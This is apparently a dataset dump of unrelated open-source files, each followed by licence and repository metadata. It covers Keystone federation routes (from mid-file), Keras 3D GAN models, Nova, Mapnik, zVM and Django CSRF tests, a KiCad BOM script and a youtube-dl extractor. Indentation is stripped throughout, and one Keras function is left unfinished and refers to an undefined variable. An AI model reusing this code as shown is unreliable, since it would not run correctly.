mapper, sp_controller,
path=self._construct_url('service_providers'),
get_action='list_service_providers',
rel=build_resource_relation(resource_name='service_providers'))
self._add_resource(
mapper, domain_controller,
path=self._construct_url('domains'),
new_path='/auth/domains',
get_action='list_domains_for_groups',
rel=build_resource_relation(resource_name='domains'))
self._add_resource(
mapper, project_controller,
path=self._construct_url('projects'),
new_path='/auth/projects',
get_action='list_projects_for_groups',
rel=build_resource_relation(resource_name='projects'))
# Auth operations
self._add_resource(
mapper, auth_controller,
path=self._construct_url('identity_providers/{idp_id}/'
'protocols/{protocol_id}/auth'),
get_post_action='federated_authentication',
rel=build_resource_relation(
resource_name='identity_provider_protocol_auth'),
path_vars={
'idp_id': IDP_ID_PARAMETER_RELATION,
'protocol_id': PROTOCOL_ID_PARAMETER_RELATION,
})
self._add_resource(
mapper, auth_controller,
path='/auth' + self._construct_url('saml2'),
post_action='create_saml_assertion',
rel=build_resource_relation(resource_name='saml2'))
self._add_resource(
mapper, auth_controller,
path='/auth' + self._construct_url('saml2/ecp'),
post_action='create_ecp_assertion',
rel=build_resource_relation(resource_name='ecp'))
self._add_resource(
mapper, auth_controller,
path='/auth' + self._construct_url('websso/{protocol_id}'),
get_post_action='federated_sso_auth',
rel=build_resource_relation(resource_name='websso'),
path_vars={
'protocol_id': PROTOCOL_ID_PARAMETER_RELATION,
})
self._add_resource(
mapper, auth_controller,
path='/auth' + self._construct_url(
'identity_providers/{idp_id}/protocols/{protocol_id}/websso'),
get_post_action='federated_idp_specific_sso_auth',
rel=build_resource_relation(resource_name='identity_providers'),
path_vars={
'idp_id': IDP_ID_PARAMETER_RELATION,
'protocol_id': PROTOCOL_ID_PARAMETER_RELATION,
})
# Keystone-Identity-Provider metadata endpoint
self._add_resource(
mapper, saml_metadata_controller,
path=self._construct_url('saml2/metadata'),
get_action='get_metadata',
rel=build_resource_relation(resource_name='metadata'))
| apache-2.0 |
shrucis1/em-data-gan | em_gan_models.py | 1 | 6116 | from keras.layers import Conv3D, Conv3DTranspose, UpSampling3D, Dense, Reshape, Flatten, Activation, Input
from keras.models import Sequential
from keras.layers.advanced_activations import LeakyReLU
from keras_adversarial.legacy import l1l2
def em_generator(latent_dim, input_shape, leaky_alpha = 6*[0.2],reg = lambda: l1l2(1e-7, 1e-7)):
model = Sequential()
model.add(Dense(1728, input_shape=(latent_dim,), kernel_regularizer=reg()))
model.add(LeakyReLU(leaky_alpha[0]))
model.add(Reshape([6,6,3,16]))
model.add(UpSampling3D((2,2,2)))
model.add(Conv3DTranspose(64, (5,5,3), kernel_regularizer=reg()))
model.add(LeakyReLU(leaky_alpha[1]))
model.add(Conv3DTranspose(32, (5,5,3), kernel_regularizer=reg()))
model.add(LeakyReLU(leaky_alpha[2]))
model.add(Conv3DTranspose(16, (5,5,3), kernel_regularizer=reg()))
model.add(LeakyReLU(leaky_alpha[3]))
model.add(Conv3DTranspose(16, (3,3,3), kernel_regularizer=reg()))
model.add(LeakyReLU(leaky_alpha[4]))
model.add(Conv3D(8, (3,3,3), kernel_regularizer=reg()))
model.add(LeakyReLU(leaky_alpha[5]))
model.add(Conv3D(1, (1,1,1), activation="sigmoid", kernel_regularizer=reg()))
return model
def em_discriminator(input_shape, leaky_alpha = 5*[0.2], reg = lambda: l1l2(1e-7, 1e-7)):
disc = Sequential()
disc.add(Conv3D(128, (5,5,3), input_shape=(input_shape+(1,)), kernel_regularizer=reg()))
disc.add(LeakyReLU(leaky_alpha[0]))
disc.add(Conv3D(64, (3,3,3), kernel_regularizer=reg()))
disc.add(LeakyReLU(leaky_alpha[1]))
disc.add(Conv3D(32, (3,3,3), kernel_regularizer=reg()))
disc.add(LeakyReLU(leaky_alpha[2]))
disc.add(Conv3D(8, (1,1,1), kernel_regularizer=reg()))
disc.add(LeakyReLU(leaky_alpha[3]))
disc.add(Flatten())
disc.add(Dense(8, kernel_regularizer=reg()))
disc.add(LeakyReLU(leaky_alpha[4]))
disc.add(Dense(1))
disc.add(Activation("sigmoid"))
return disc
def em_generator_large(latent_dim, input_shape, leaky_alpha = 7*[0.2], reg = lambda: l1l2(1e-7, 1e-7)):
model = Sequential()
model.add(Dense(3072, input_shape=(latent_dim,), kernel_regularizer=reg()))
model.add(LeakyReLU(leaky_alpha[0]))
model.add(Reshape([8,8,3,16]))
model.add(UpSampling3D((6,6,2)))
model.add(Conv3DTranspose(64, (7,7,3), kernel_regularizer=reg()))
model.add(LeakyReLU(leaky_alpha[1]))
model.add(Conv3DTranspose(32, (7,7,3), kernel_regularizer=reg()))
model.add(LeakyReLU(leaky_alpha[2]))
model.add(Conv3DTranspose(16, (5,5,3), kernel_regularizer=reg()))
model.add(LeakyReLU(leaky_alpha[3]))
model.add(Conv3DTranspose(16, (5,5,3), kernel_regularizer=reg()))
model.add(LeakyReLU(leaky_alpha[4]))
model.add(Conv3D(8, (3,3,5), kernel_regularizer=reg()))
model.add(LeakyReLU(leaky_alpha[5]))
model.add(Conv3D(8, (3,3,4), kernel_regularizer=reg()))
model.add(LeakyReLU(leaky_alpha[6]))
model.add(Conv3D(1, (1,1,1), activation="sigmoid", kernel_regularizer=reg()))
return model
def em_discriminator_large(input_shape, leaky_alpha = 7*[0.2], reg = lambda: l1l2(1e-7, 1e-7)):
disc = Sequential()
disc.add(UpSampling3D((1,1,2), input_shape=(input_shape+(1,))))
disc.add(Conv3D(128, (7,7,3), kernel_regularizer=reg()))
disc.add(LeakyReLU(leaky_alpha[0]))
disc.add(Conv3D(64, (5,5,3), kernel_regularizer=reg()))
disc.add(LeakyReLU(leaky_alpha[1]))
disc.add(Conv3D(64, (5,5,3), kernel_regularizer=reg()))
disc.add(LeakyReLU(leaky_alpha[2]))
disc.add(Conv3D(64, (3,3,3), kernel_regularizer=reg()))
disc.add(LeakyReLU(leaky_alpha[3]))
disc.add(Conv3D(32, (3,3,1), kernel_regularizer=reg()))
disc.add(LeakyReLU(leaky_alpha[4]))
disc.add(Conv3D(16, (1,1,1), kernel_regularizer=reg()))
disc.add(LeakyReLU(leaky_alpha[5]))
disc.add(Flatten())
disc.add(Dense(16, kernel_regularizer=reg()))
disc.add(LeakyReLU(leaky_alpha[6]))
disc.add(Dense(1))
disc.add(Activation("sigmoid"))
return disc
def em_generator_large_boundaries(latent_dim, input_shape, leaky_alpha = 7*[0.2], reg = lambda: l1l2(1e-7, 1e-7)):
input_layer = Input(shape=(latent_dim,))
l = Dense(3072, kernel_regularizer=reg())(input_layer)
l = LeakyReLU(leaky_alpha[0])(l)
l = Reshape([8,8,3,16])(l)
l = UpSampling3D((6,6,2))(l)
l = Conv3DTranspose(64, (7,7,3), kernel_regularizer=reg())(l)
l = LeakyReLU(leaky_alpha[1])(l)
l = Conv3DTranspose(32, (7,7,3), kernel_regularizer=reg())(l)
l = LeakyReLU(leaky_alpha[2])(l)
l = Conv3DTranspose(16, (5,5,3), kernel_regularizer=reg())(l)
l = LeakyReLU(leaky_alpha[3])(l)
l = Conv3DTranspose(16, (5,5,3), kernel_regularizer=reg())(l)
l = LeakyReLU(leaky_alpha[4])(l)
l = Conv3D(8, (3,3,5), kernel_regularizer=reg())(l)
l = LeakyReLU(leaky_alpha[5])(l)
l = Conv3D(8, (3,3,4), kernel_regularizer=reg())(l)
l = LeakyReLU(leaky_alpha[6])(l)
#TODO finish and add boundaries
model.add(Conv3D(1, (1,1,1), activation="sigmoid", kernel_regularizer=reg()))
return model
#TODO add boundaries to discriminator
def em_discriminator_large_boundaries(input_shape, leaky_alpha = 7*[0.2], reg = lambda: l1l2(1e-7, 1e-7)):
disc = Sequential()
disc.add(UpSampling3D((1,1,2), input_shape=(input_shape+(1,))))
disc.add(Conv3D(128, (7,7,3), kernel_regularizer=reg()))
disc.add(LeakyReLU(leaky_alpha[0]))
disc.add(Conv3D(64, (5,5,3), kernel_regularizer=reg()))
disc.add(LeakyReLU(leaky_alpha[1]))
disc.add(Conv3D(64, (5,5,3), kernel_regularizer=reg()))
disc.add(LeakyReLU(leaky_alpha[2]))
disc.add(Conv3D(64, (3,3,3), kernel_regularizer=reg()))
disc.add(LeakyReLU(leaky_alpha[3]))
disc.add(Conv3D(32, (3,3,1), kernel_regularizer=reg()))
disc.add(LeakyReLU(leaky_alpha[4]))
disc.add(Conv3D(16, (1,1,1), kernel_regularizer=reg()))
disc.add(LeakyReLU(leaky_alpha[5]))
disc.add(Flatten())
disc.add(Dense(16, kernel_regularizer=reg()))
disc.add(LeakyReLU(leaky_alpha[6]))
disc.add(Dense(1))
disc.add(Activation("sigmoid"))
return disc
| gpl-2.0 |
petrutlucian94/nova_dev | nova/tests/virt/vmwareapi/test_vm_util_datastore_selection.py | 3 | 5170 | #
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import collections
import re
from nova import test
from nova.virt.vmwareapi import vm_util
ResultSet = collections.namedtuple('ResultSet', ['objects'])
ResultSetToken = collections.namedtuple('ResultSet', ['objects', 'token'])
ObjectContent = collections.namedtuple('ObjectContent', ['obj', 'propSet'])
DynamicProperty = collections.namedtuple('Property', ['name', 'val'])
MoRef = collections.namedtuple('ManagedObjectReference', ['value'])
class VMwareVMUtilDatastoreSelectionTestCase(test.NoDBTestCase):
def setUp(self):
super(VMwareVMUtilDatastoreSelectionTestCase, self).setUp()
self.data = [
['VMFS', 'os-some-name', True, 987654321, 12346789],
['NFS', 'another-name', True, 9876543210, 123467890],
['BAD', 'some-name-bad', True, 98765432100, 1234678900],
['VMFS', 'some-name-good', False, 987654321, 12346789],
]
def build_result_set(self, mock_data, name_list=None):
# datastores will have a moref_id of ds-000 and
# so on based on their index in the mock_data list
if name_list is None:
name_list = self.propset_name_list
objects = []
for id, row in enumerate(mock_data):
obj = ObjectContent(
obj=MoRef(value="ds-%03d" % id),
propSet=[])
for index, value in enumerate(row):
obj.propSet.append(
DynamicProperty(name=name_list[index], val=row[index]))
objects.append(obj)
return ResultSet(objects=objects)
@property
def propset_name_list(self):
return ['summary.type', 'summary.name', 'summary.accessible',
'summary.capacity', 'summary.freeSpace']
def test_filter_datastores_simple(self):
datastores = self.build_result_set(self.data)
rec = vm_util._get_datastore_ref_and_name(datastores)
self.assertIsNotNone(rec[0], "could not find datastore!")
self.assertEqual('ds-001', rec[0].value,
"didn't find the right datastore!")
self.assertEqual(123467890, rec[3],
"did not obtain correct freespace!")
def test_filter_datastores_empty(self):
data = []
datastores = self.build_result_set(data)
rec = vm_util._get_datastore_ref_and_name(datastores)
self.assertIsNone(rec)
def test_filter_datastores_no_match(self):
datastores = self.build_result_set(self.data)
datastore_regex = re.compile('no_match.*')
rec = vm_util._get_datastore_ref_and_name(datastores,
datastore_regex)
self.assertIsNone(rec, "did not fail to match datastore properly")
def test_filter_datastores_specific_match(self):
data = [
['VMFS', 'os-some-name', True, 987654321, 1234678],
['NFS', 'another-name', True, 9876543210, 123467890],
['BAD', 'some-name-bad', True, 98765432100, 1234678900],
['VMFS', 'some-name-good', True, 987654321, 12346789],
['VMFS', 'some-other-good', False, 987654321000, 12346789000],
]
# only the DS some-name-good is accessible and matches the regex
datastores = self.build_result_set(data)
datastore_regex = re.compile('.*-good$')
rec = vm_util._get_datastore_ref_and_name(datastores,
datastore_regex)
self.assertIsNotNone(rec, "could not find datastore!")
self.assertEqual('ds-003', rec[0].value,
"didn't find the right datastore!")
self.assertNotEqual('ds-004', rec[0].value,
"accepted an unreachable datastore!")
self.assertEqual('some-name-good', rec[1])
self.assertEqual(12346789, rec[3],
"did not obtain correct freespace!")
self.assertEqual(987654321, rec[2],
"did not obtain correct capacity!")
def test_filter_datastores_missing_props(self):
data = [
['VMFS', 'os-some-name', 987654321, 1234678],
['NFS', 'another-name', 9876543210, 123467890],
]
# no matches are expected when 'summary.accessible' is missing
prop_names = ['summary.type', 'summary.name',
'summary.capacity', 'summary.freeSpace']
datastores = self.build_result_set(data, prop_names)
rec = vm_util._get_datastore_ref_and_name(datastores)
self.assertIsNone(rec, "no matches were expected")
| apache-2.0 |
peterpolidoro/kicad_bom | kicad_bom/kicad_bom.py | 2 | 8824 | #
# Python script to generate BOM in multiple formats from a KiCad generic netlist.
#
import kicad_netlist_reader
import os
import csv
class KicadBom:
def __init__(self,netlist_path=None):
self._netlist_ext = '.xml'
self._netlist_path = None
self._netlist = None
self._grouped_components = None
self._column_names = None
self._no_part_number = 'NO_PART_NUMBER'
self._update_netlist(netlist_path)
if self._netlist_path is None:
return
self._output_dir = os.path.join(os.path.dirname(self._netlist_path),'bom')
if not os.path.exists(self._output_dir):
os.makedirs(self._output_dir)
def _update_netlist(self,netlist_path=None):
if (self._netlist_path is None) or (netlist_path is not None):
self._read_netlist(netlist_path)
def _find_netlist_path(self,netlist_path=None):
search_path = None
if (netlist_path is None) or (not os.path.exists(netlist_path)):
search_path = os.getcwd()
elif os.path.isdir(netlist_path):
search_path = netlist_path
else:
(root,ext) = os.path.splitext(netlist_path)
if ext == self._netlist_ext:
return netlist_path
else:
return None
for root, dirs, files in os.walk(search_path):
for f in files:
if f.endswith(self._netlist_ext):
return os.path.join(root,f)
return None
def _read_netlist(self,netlist_path=None):
self._netlist_path = self._find_netlist_path(netlist_path)
if self._netlist_path is None:
raise RuntimeError('Cannot find netlist!')
# Generate an instance of a generic netlist and load the netlist tree.
self._netlist = kicad_netlist_reader.netlist(self._netlist_path)
# subset the components to those wanted in the BOM, controlled
# by <configure> block in kicad_netlist_reader.py
components = self._netlist.getInterestingComponents()
compfields = self._netlist.gatherComponentFieldUnion(components)
partfields = self._netlist.gatherLibPartFieldUnion()
partfields -= set(['Reference','Value','Datasheet','Footprint'])
additional_columns = compfields | partfields # union
self._column_names = ['Item','Reference(s)','Quantity']
self._base_column_length = len(self._column_names)
if 'Manufacturer' in additional_columns:
self._column_names.append('Manufacturer')
if 'Manufacturer Part Number' in additional_columns:
self._column_names.append('Manufacturer Part Number')
if 'Vendor' in additional_columns:
self._column_names.append('Vendor')
if 'Vendor Part Number' in additional_columns:
self._column_names.append('Vendor Part Number')
if 'Description' in additional_columns:
self._column_names.append('Description')
if 'Package' in additional_columns:
self._column_names.append('Package')
# Get all of the components in groups of matching parts + values
# (see kicad_netlist_reader.py)
self._grouped_components = self._netlist.groupComponents(components)
def _get_bom_row_from_part(self,item,part_number,part_info):
ref_string = self._refs_to_string(part_info['refs'])
quantity = part_info['quantity']
group = part_info['group']
row = []
if part_number is not self._no_part_number:
row.append(item)
else:
row.append('')
row.append(ref_string);
row.append(quantity)
for field in self._column_names[self._base_column_length:]:
value = self._netlist.getGroupField(group, field)
row.append(value)
return row
def _get_parts_by_manufacturer_part_number(self):
parts = {}
for group in self._grouped_components:
try:
part_number = self._netlist.getGroupField(group,'Manufacturer Part Number')
if not part_number:
part_number = self._no_part_number
except ValueError:
part_number = self._no_part_number
refs = []
for component in group:
refs.append(component.getRef())
quantity = self._get_quantity_from_group(group)
if part_number in parts:
parts[part_number]['refs'].extend(refs)
parts[part_number]['quantity'] += quantity
else:
parts[part_number] = {'refs':refs, 'quantity':quantity, 'group':group}
return parts
def _refs_to_string(self,refs):
ref_string = ''
for ref in refs:
if len(ref_string) > 0:
ref_string += " "
ref_string += ref
return ref_string
def _get_quantity_from_group(self,group):
count = len(group)
try:
quantity = int(self._netlist.getGroupField(group,'Quantity'))
except ValueError:
quantity = 1
quantity *= count
return quantity
def _get_parts_by_vendor(self):
# Create vendor set
vendor_set = set()
for group in self._grouped_components:
try:
vendor = self._netlist.getGroupField(group,'Vendor')
if vendor:
vendor_set.add(vendor)
except:
pass
parts_by_vendor = {}
for vendor in vendor_set:
parts = {}
for group in self._grouped_components:
part_number = None
try:
if vendor == self._netlist.getGroupField(group,'Vendor'):
part_number = self._netlist.getGroupField(group,'Vendor Part Number')
except ValueError:
pass
if part_number:
quantity = self._get_quantity_from_group(group)
if part_number in parts:
parts[part_number]['quantity'] += quantity
else:
parts[part_number] = {'quantity':quantity}
parts_by_vendor[vendor] = parts
return parts_by_vendor
def _get_vendor_row_from_part(self,part_number,part_info):
row = []
row.append(part_number)
row.append(part_info['quantity'])
return row
def get_bom(self):
# Create header row
row = []
for c in self._column_names:
row.append(c)
# Create bom
bom = []
bom.append(row)
parts_by_manufacturer_part_number = self._get_parts_by_manufacturer_part_number()
item = 0
row_of_parts_without_number = None
for part_number, part_info in parts_by_manufacturer_part_number.items():
if part_number is not self._no_part_number:
item += 1
row = self._get_bom_row_from_part(item,part_number,part_info)
if part_number is not self._no_part_number:
bom.append(row)
else:
row_of_parts_without_number = row
if row_of_parts_without_number:
bom.append(row_of_parts_without_number)
return bom
def save_bom_csv_file(self):
bom = self.get_bom()
bom_filename = 'bom.csv'
bom_output_path = os.path.join(self._output_dir,bom_filename)
with open(bom_output_path,'w') as f:
bom_writer = csv.writer(f,quotechar='\"',quoting=csv.QUOTE_MINIMAL)
for row in bom:
bom_writer.writerow(row)
def save_vendor_parts_csv_files(self):
parts_by_vendor = self._get_parts_by_vendor()
for vendor in parts_by_vendor:
vendor_parts_filename = str(vendor) + '_parts.csv'
vendor_parts_output_path = os.path.join(self._output_dir,vendor_parts_filename)
with open(vendor_parts_output_path,'w') as f:
vendor_parts_writer = csv.writer(f,quotechar='\"',quoting=csv.QUOTE_MINIMAL)
parts = parts_by_vendor[vendor]
for part_number, part_info in parts.items():
row = self._get_vendor_row_from_part(part_number,part_info)
vendor_parts_writer.writerow(row)
def save_all_csv_files(self):
self.save_bom_csv_file()
self.save_vendor_parts_csv_files()
def save_all_csv_files():
kb = KicadBom()
kb.save_all_csv_files()
# -----------------------------------------------------------------------------------------
if __name__ == '__main__':
save_all_csv_files()
| gpl-2.0 |
mapycz/python-mapnik | test/python_tests/raster_symbolizer_test.py | 1 | 8474 | import os
from nose.tools import eq_
import mapnik
from .utilities import execution_path, get_unique_colors, run_all
def setup():
# All of the paths used are relative, if we run the tests
# from another directory we need to chdir()
os.chdir(execution_path('.'))
def test_dataraster_coloring():
srs = '+init=epsg:32630'
lyr = mapnik.Layer('dataraster')
if 'gdal' in mapnik.DatasourceCache.plugin_names():
lyr.datasource = mapnik.Gdal(
file='../data/raster/dataraster.tif',
band=1,
)
lyr.srs = srs
_map = mapnik.Map(256, 256, srs)
style = mapnik.Style()
rule = mapnik.Rule()
sym = mapnik.RasterSymbolizer()
# Assigning a colorizer to the RasterSymbolizer tells the later
# that it should use it to colorize the raw data raster
colorizer = mapnik.RasterColorizer(
mapnik.COLORIZER_DISCRETE,
mapnik.Color("transparent"))
for value, color in [
(0, "#0044cc"),
(10, "#00cc00"),
(20, "#ffff00"),
(30, "#ff7f00"),
(40, "#ff0000"),
(50, "#ff007f"),
(60, "#ff00ff"),
(70, "#cc00cc"),
(80, "#990099"),
(90, "#660066"),
(200, "transparent"),
]:
colorizer.add_stop(value, mapnik.Color(color))
sym.colorizer = colorizer
rule.symbols.append(sym)
style.rules.append(rule)
_map.append_style('foo', style)
lyr.styles.append('foo')
_map.layers.append(lyr)
_map.zoom_to_box(lyr.envelope())
im = mapnik.Image(_map.width, _map.height)
mapnik.render(_map, im)
expected_file = './images/support/dataraster_coloring.png'
actual_file = '/tmp/' + os.path.basename(expected_file)
im.save(actual_file, 'png32')
if not os.path.exists(expected_file) or os.environ.get('UPDATE'):
im.save(expected_file, 'png32')
actual = mapnik.Image.open(actual_file)
expected = mapnik.Image.open(expected_file)
eq_(actual.tostring('png32'),
expected.tostring('png32'),
'failed comparing actual (%s) and expected (%s)' % (actual_file,
expected_file))
def test_dataraster_query_point():
srs = '+init=epsg:32630'
lyr = mapnik.Layer('dataraster')
if 'gdal' in mapnik.DatasourceCache.plugin_names():
lyr.datasource = mapnik.Gdal(
file='../data/raster/dataraster.tif',
band=1,
)
lyr.srs = srs
_map = mapnik.Map(256, 256, srs)
_map.layers.append(lyr)
x, y = 556113.0, 4381428.0 # center of extent of raster
_map.zoom_all()
features = list(_map.query_point(0, x, y))
assert len(features) == 1
feat = features[0]
center = feat.envelope().center()
assert center.x == x and center.y == y, center
value = feat['value']
assert value == 18.0, value
# point inside map extent but outside raster extent
current_box = _map.envelope()
current_box.expand_to_include(-427417, 4477517)
_map.zoom_to_box(current_box)
features = _map.query_point(0, -427417, 4477517)
assert len(list(features)) == 0
# point inside raster extent with nodata
features = _map.query_point(0, 126850, 4596050)
assert len(list(features)) == 0
def test_load_save_map():
map = mapnik.Map(256, 256)
in_map = "../data/good_maps/raster_symbolizer.xml"
try:
mapnik.load_map(map, in_map)
out_map = mapnik.save_map_to_string(map)
assert 'RasterSymbolizer' in out_map
assert 'RasterColorizer' in out_map
assert 'stop' in out_map
except RuntimeError as e:
# only test datasources that we have installed
if not 'Could not create datasource' in str(e):
raise RuntimeError(str(e))
def test_raster_with_alpha_blends_correctly_with_background():
WIDTH = 500
HEIGHT = 500
map = mapnik.Map(WIDTH, HEIGHT)
WHITE = mapnik.Color(255, 255, 255)
map.background = WHITE
style = mapnik.Style()
rule = mapnik.Rule()
symbolizer = mapnik.RasterSymbolizer()
symbolizer.scaling = mapnik.scaling_method.BILINEAR
rule.symbols.append(symbolizer)
style.rules.append(rule)
map.append_style('raster_style', style)
map_layer = mapnik.Layer('test_layer')
filepath = '../data/raster/white-alpha.png'
if 'gdal' in mapnik.DatasourceCache.plugin_names():
map_layer.datasource = mapnik.Gdal(file=filepath)
map_layer.styles.append('raster_style')
map.layers.append(map_layer)
map.zoom_all()
mim = mapnik.Image(WIDTH, HEIGHT)
mapnik.render(map, mim)
mim.tostring()
# All white is expected
eq_(get_unique_colors(mim), ['rgba(254,254,254,255)'])
def test_raster_warping():
lyrSrs = "+init=epsg:32630"
mapSrs = '+proj=longlat +ellps=WGS84 +datum=WGS84 +no_defs'
lyr = mapnik.Layer('dataraster', lyrSrs)
if 'gdal' in mapnik.DatasourceCache.plugin_names():
lyr.datasource = mapnik.Gdal(
file='../data/raster/dataraster.tif',
band=1,
)
sym = mapnik.RasterSymbolizer()
sym.colorizer = mapnik.RasterColorizer(
mapnik.COLORIZER_DISCRETE, mapnik.Color(255, 255, 0))
rule = mapnik.Rule()
rule.symbols.append(sym)
style = mapnik.Style()
style.rules.append(rule)
_map = mapnik.Map(256, 256, mapSrs)
_map.append_style('foo', style)
lyr.styles.append('foo')
_map.layers.append(lyr)
map_proj = mapnik.Projection(mapSrs)
layer_proj = mapnik.Projection(lyrSrs)
prj_trans = mapnik.ProjTransform(map_proj,
layer_proj)
_map.zoom_to_box(prj_trans.backward(lyr.envelope()))
im = mapnik.Image(_map.width, _map.height)
mapnik.render(_map, im)
expected_file = './images/support/raster_warping.png'
actual_file = '/tmp/' + os.path.basename(expected_file)
im.save(actual_file, 'png32')
if not os.path.exists(expected_file) or os.environ.get('UPDATE'):
im.save(expected_file, 'png32')
actual = mapnik.Image.open(actual_file)
expected = mapnik.Image.open(expected_file)
eq_(actual.tostring('png32'),
expected.tostring('png32'),
'failed comparing actual (%s) and expected (%s)' % (actual_file,
expected_file))
def test_raster_warping_does_not_overclip_source():
lyrSrs = "+init=epsg:32630"
mapSrs = '+proj=longlat +ellps=WGS84 +datum=WGS84 +no_defs'
lyr = mapnik.Layer('dataraster', lyrSrs)
if 'gdal' in mapnik.DatasourceCache.plugin_names():
lyr.datasource = mapnik.Gdal(
file='../data/raster/dataraster.tif',
band=1,
)
sym = mapnik.RasterSymbolizer()
sym.colorizer = mapnik.RasterColorizer(
mapnik.COLORIZER_DISCRETE, mapnik.Color(255, 255, 0))
rule = mapnik.Rule()
rule.symbols.append(sym)
style = mapnik.Style()
style.rules.append(rule)
_map = mapnik.Map(256, 256, mapSrs)
_map.background = mapnik.Color('white')
_map.append_style('foo', style)
lyr.styles.append('foo')
_map.layers.append(lyr)
_map.zoom_to_box(mapnik.Box2d(3, 42, 4, 43))
im = mapnik.Image(_map.width, _map.height)
mapnik.render(_map, im)
expected_file = './images/support/raster_warping_does_not_overclip_source.png'
actual_file = '/tmp/' + os.path.basename(expected_file)
im.save(actual_file, 'png32')
if not os.path.exists(expected_file) or os.environ.get('UPDATE'):
im.save(expected_file, 'png32')
actual = mapnik.Image.open(actual_file)
expected = mapnik.Image.open(expected_file)
eq_(actual.tostring('png32'),
expected.tostring('png32'),
'failed comparing actual (%s) and expected (%s)' % (actual_file,
expected_file))
if __name__ == "__main__":
setup()
exit(run_all(eval(x) for x in dir() if x.startswith("test_")))
| lgpl-2.1 |
vimagick/youtube-dl | youtube_dl/extractor/collegerama.py | 111 | 3306 | from __future__ import unicode_literals
import json
from .common import InfoExtractor
from ..compat import compat_urllib_request
from ..utils import (
float_or_none,
int_or_none,
)
class CollegeRamaIE(InfoExtractor):
_VALID_URL = r'https?://collegerama\.tudelft\.nl/Mediasite/Play/(?P<id>[\da-f]+)'
_TESTS = [
{
'url': 'https://collegerama.tudelft.nl/Mediasite/Play/585a43626e544bdd97aeb71a0ec907a01d',
'md5': '481fda1c11f67588c0d9d8fbdced4e39',
'info_dict': {
'id': '585a43626e544bdd97aeb71a0ec907a01d',
'ext': 'mp4',
'title': 'Een nieuwe wereld: waarden, bewustzijn en techniek van de mensheid 2.0.',
'description': '',
'thumbnail': 're:^https?://.*\.jpg$',
'duration': 7713.088,
'timestamp': 1413309600,
'upload_date': '20141014',
},
},
{
'url': 'https://collegerama.tudelft.nl/Mediasite/Play/86a9ea9f53e149079fbdb4202b521ed21d?catalog=fd32fd35-6c99-466c-89d4-cd3c431bc8a4',
'md5': 'ef1fdded95bdf19b12c5999949419c92',
'info_dict': {
'id': '86a9ea9f53e149079fbdb4202b521ed21d',
'ext': 'wmv',
'title': '64ste Vakantiecursus: Afvalwater',
'description': 'md5:7fd774865cc69d972f542b157c328305',
'duration': 10853,
'timestamp': 1326446400,
'upload_date': '20120113',
},
},
]
def _real_extract(self, url):
video_id = self._match_id(url)
player_options_request = {
"getPlayerOptionsRequest": {
"ResourceId": video_id,
"QueryString": "",
}
}
request = compat_urllib_request.Request(
'http://collegerama.tudelft.nl/Mediasite/PlayerService/PlayerService.svc/json/GetPlayerOptions',
json.dumps(player_options_request))
request.add_header('Content-Type', 'application/json')
player_options = self._download_json(request, video_id)
presentation = player_options['d']['Presentation']
title = presentation['Title']
description = presentation.get('Description')
thumbnail = None
duration = float_or_none(presentation.get('Duration'), 1000)
timestamp = int_or_none(presentation.get('UnixTime'), 1000)
formats = []
for stream in presentation['Streams']:
for video in stream['VideoUrls']:
thumbnail_url = stream.get('ThumbnailUrl')
if thumbnail_url:
thumbnail = 'http://collegerama.tudelft.nl' + thumbnail_url
format_id = video['MediaType']
if format_id == 'SS':
continue
formats.append({
'url': video['Location'],
'format_id': format_id,
})
self._sort_formats(formats)
return {
'id': video_id,
'title': title,
'description': description,
'thumbnail': thumbnail,
'duration': duration,
'timestamp': timestamp,
'formats': formats,
}
| unlicense |
mfcloud/python-zvm-sdk | zvmsdk/tests/unit/test_utils.py | 1 | 1438 | # Copyright 2017 IBM Corp.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import mock
import zvmsdk.utils as zvmutils
from zvmsdk.tests.unit import base
class ZVMUtilsTestCases(base.SDKTestCase):
def test_convert_to_mb(self):
self.assertEqual(2355.2, zvmutils.convert_to_mb('2.3G'))
self.assertEqual(20, zvmutils.convert_to_mb('20M'))
self.assertEqual(1153433.6, zvmutils.convert_to_mb('1.1T'))
@mock.patch.object(zvmutils, 'get_smt_userid')
def test_get_namelist(self, gsu):
gsu.return_value = 'TUID'
self.assertEqual('TSTNLIST', zvmutils.get_namelist())
base.set_conf('zvm', 'namelist', None)
gsu.return_value = 'TUID'
self.assertEqual('NL00TUID', zvmutils.get_namelist())
gsu.return_value = 'TESTUSER'
self.assertEqual('NLSTUSER', zvmutils.get_namelist())
base.set_conf('zvm', 'namelist', 'TSTNLIST')
| apache-2.0 |
mshafiq9/django | tests/view_tests/tests/test_csrf.py | 253 | 3203 | from django.test import Client, SimpleTestCase, override_settings
from django.utils.translation import override
@override_settings(ROOT_URLCONF="view_tests.urls")
class CsrfViewTests(SimpleTestCase):
def setUp(self):
super(CsrfViewTests, self).setUp()
self.client = Client(enforce_csrf_checks=True)
@override_settings(
USE_I18N=True,
MIDDLEWARE_CLASSES=[
'django.middleware.locale.LocaleMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
],
)
def test_translation(self):
"""
Test that an invalid request is rejected with a localized error message.
"""
response = self.client.post('/')
self.assertContains(response, "Forbidden", status_code=403)
self.assertContains(response,
"CSRF verification failed. Request aborted.",
status_code=403)
with self.settings(LANGUAGE_CODE='nl'), override('en-us'):
response = self.client.post('/')
self.assertContains(response, "Verboden", status_code=403)
self.assertContains(response,
"CSRF-verificatie mislukt. Verzoek afgebroken.",
status_code=403)
@override_settings(
SECURE_PROXY_SSL_HEADER=('HTTP_X_FORWARDED_PROTO', 'https')
)
def test_no_referer(self):
"""
Referer header is strictly checked for POST over HTTPS. Trigger the
exception by sending an incorrect referer.
"""
response = self.client.post('/', HTTP_X_FORWARDED_PROTO='https')
self.assertContains(response,
"You are seeing this message because this HTTPS "
"site requires a 'Referer header' to be "
"sent by your Web browser, but none was sent.",
status_code=403)
